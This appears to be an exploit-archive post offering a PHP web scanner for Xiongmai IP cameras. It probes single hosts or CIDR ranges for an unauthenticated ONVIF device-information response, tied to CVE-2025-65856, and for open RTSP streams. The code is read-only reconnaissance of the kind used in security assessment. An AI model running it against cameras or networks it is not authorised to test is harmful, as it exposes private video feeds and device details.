=============================================================================================================================================
| # Title Xiongmai XM530 ONVIF / RTSP Security Scanner
=============================================================================================================================================
| # Title : Xiongmai XM530 ONVIF & RTSP Security Scanner for IP Cameras |
| # Author :
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://www.xiongmaitech.com/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/213044/ & CVE-2025-65856
[+] Summary : This project is a unified PHP-based security scanner designed to identify critical vulnerabilities in IP cameras,
with a primary focus on ONVIF authentication bypass (CVE-2025-65856) and unauthenticated RTSP stream exposure.
The tool provides a single-file web interface that allows scanning a single IP address or an entire network range (CIDR), detecting exposed services,
fingerprinting device information (manufacturer and model), and assessing risk severity (LOW, MEDIUM, HIGH, CRITICAL).
The scanner is optimized for defensive security assessments and SOC use cases, generating structured JSON-compatible results suitable for SIEM ingestion.
It operates without external libraries, supports AJAX-based scanning without page reloads, and is fully compatible with standard PHP environments such as XAMPP.
[+] Key capabilities include:
Detection of ONVIF authentication bypass vulnerabilities
Identification of exposed RTSP streams without credentials
Automatic severity classification based on exposure level
Device fingerprinting (manufacturer / model when available)
Network-wide scanning via CIDR notation
Lightweight, single-file PHP web interface
Read-only, non-destructive Proof-of-Concept suitable for lawful security testing
[+] POC : How to Use It
Place the file inside: htdocs/camera_scanner.php
Open your browser:http://localhost/camera_scanner.php
Example Input :192.168.1.10 or 192.168.1.0/24
<?php
set_time_limit(0);
error_reporting(E_ALL & ~E_WARNING);
function port_open($ip, $port, $timeout = 2) {
$fp = @fsockopen($ip, $port, $errno, $errstr, $timeout);
if ($fp) {
fclose($fp);
return true;
}
return false;
}
function severity($onvif, $rtsp) {
if ($onvif && $rtsp) return "CRITICAL";
if ($onvif) return "HIGH";
if ($rtsp) return "MEDIUM";
return "LOW";
}
function check_onvif($ip, $port) {
$soap = <<<XML
<?xml version="1.0" encoding="UTF-8"?>
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Body>
<GetDeviceInformation xmlns="http://www.onvif.org/ver10/device/wsdl"/>
</s:Body>
</s:Envelope>
XML;
$opts = [
'http' => [
'method' => "POST",
'header' => "Content-Type: application/soap+xml\r\n",
'content' => $soap,
'timeout' => 3
]
];
$ctx = stream_context_create($opts);
$url = "http://$ip:$port/onvif/device_service";
$res = @file_get_contents($url, false, $ctx);
if ($res && strpos($res, "Manufacturer") !== false) {
preg_match('/<Manufacturer>(.*?)<\/Manufacturer>/', $res, $m);
preg_match('/<Model>(.*?)<\/Model>/', $res, $mo);
return [
"onvif" => true,
"manufacturer" => $m[1] ?? "Unknown",
"model" => $mo[1] ?? "Unknown",
"port" => $port
];
}
return ["onvif" => false];
}
function check_rtsp($ip, $port) {
$fp = @fsockopen($ip, $port, $e, $s, 2);
if ($fp) {
fwrite($fp, "OPTIONS rtsp://$ip RTSP/1.0\r\nCSeq: 1\r\n\r\n");
$r = fread($fp, 256);
fclose($fp);
if (strpos($r, "RTSP") !== false) return true;
}
return false;
}
function scan_ip($ip) {
$onvif = false;
$rtsp = false;
$info = [];
foreach ([80,8899,8080] as $p) {
if (port_open($ip, $p)) {
$r = check_onvif($ip, $p);
if ($r['onvif']) {
$onvif = true;
$info = $r;
break;
}
}
}
foreach ([554,8554] as $p) {
if (port_open($ip, $p) && check_rtsp($ip, $p)) {
$rtsp = true;
$info['rtsp_port'] = $p;
break;
}
}
return [
"ip" => $ip,
"onvif" => $onvif,
"rtsp" => $rtsp,
"manufacturer" => $info['manufacturer'] ?? "-",
"model" => $info['model'] ?? "-",
"severity" => severity($onvif, $rtsp),
"time" => date("Y-m-d H:i:s")
];
}
/* ================= AJAX ================= */
if (isset($_POST['target'])) {
$target = trim($_POST['target']);
$results = [];
if (strpos($target, "/") !== false) {
[$net, $cidr] = explode("/", $target);
$mask = ~((1 << (32 - $cidr)) - 1);
$start = ip2long($net) & $mask;
$end = $start | ~$mask;
for ($i = $start + 1; $i < $end; $i++) {
$ip = long2ip($i);
$r = scan_ip($ip);
if ($r['onvif'] || $r['rtsp']) {
$results[] = $r;
}
}
} else {
$results[] = scan_ip($target);
}
header("Content-Type: application/json");
echo json_encode($results, JSON_PRETTY_PRINT);
exit;
}
?>
<!DOCTYPE html>
<html lang="ar" dir="rtl">
<head>
<meta charset="utf-8">
<title>Camera Security Scanner</title>
<style>
body{font-family:tahoma;background:#0f172a;color:#e5e7eb}
.box{width:900px;margin:30px auto;background:#020617;padding:20px;border-radius:10px}
input,button{padding:10px;width:100%;margin:5px 0}
button{background:#2563eb;color:#fff;border:0;cursor:pointer}
pre{background:#020617;padding:10px;max-height:400px;overflow:auto}
.CRITICAL{color:#dc2626}
.HIGH{color:#f97316}
.MEDIUM{color:#eab308}
</style>
</head>
<body>
<div class="box">
<h2>? ??? ??????? ONVIF / RTSP</h2>
<input id="target" placeholder="192.168.1.10 ?? 192.168.1.0/24">
<button onclick="scan()">???? ?????</button>
<pre id="out"></pre>
</div>
<script>
function scan(){
document.getElementById("out").textContent="???? ?????...";
fetch("",{
method:"POST",
headers:{"Content-Type":"application/x-www-form-urlencoded"},
body:"target="+encodeURIComponent(document.getElementById("target").value)
})
.then(r=>r.json())
.then(d=>{
let o="";
d.forEach(x=>{
o+=`[${x.severity}] ${x.ip} | ONVIF:${x.onvif} RTSP:${x.rtsp}\n`;
});
document.getElementById("out").textContent=o;
});
}
</script>
</body>
</html>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================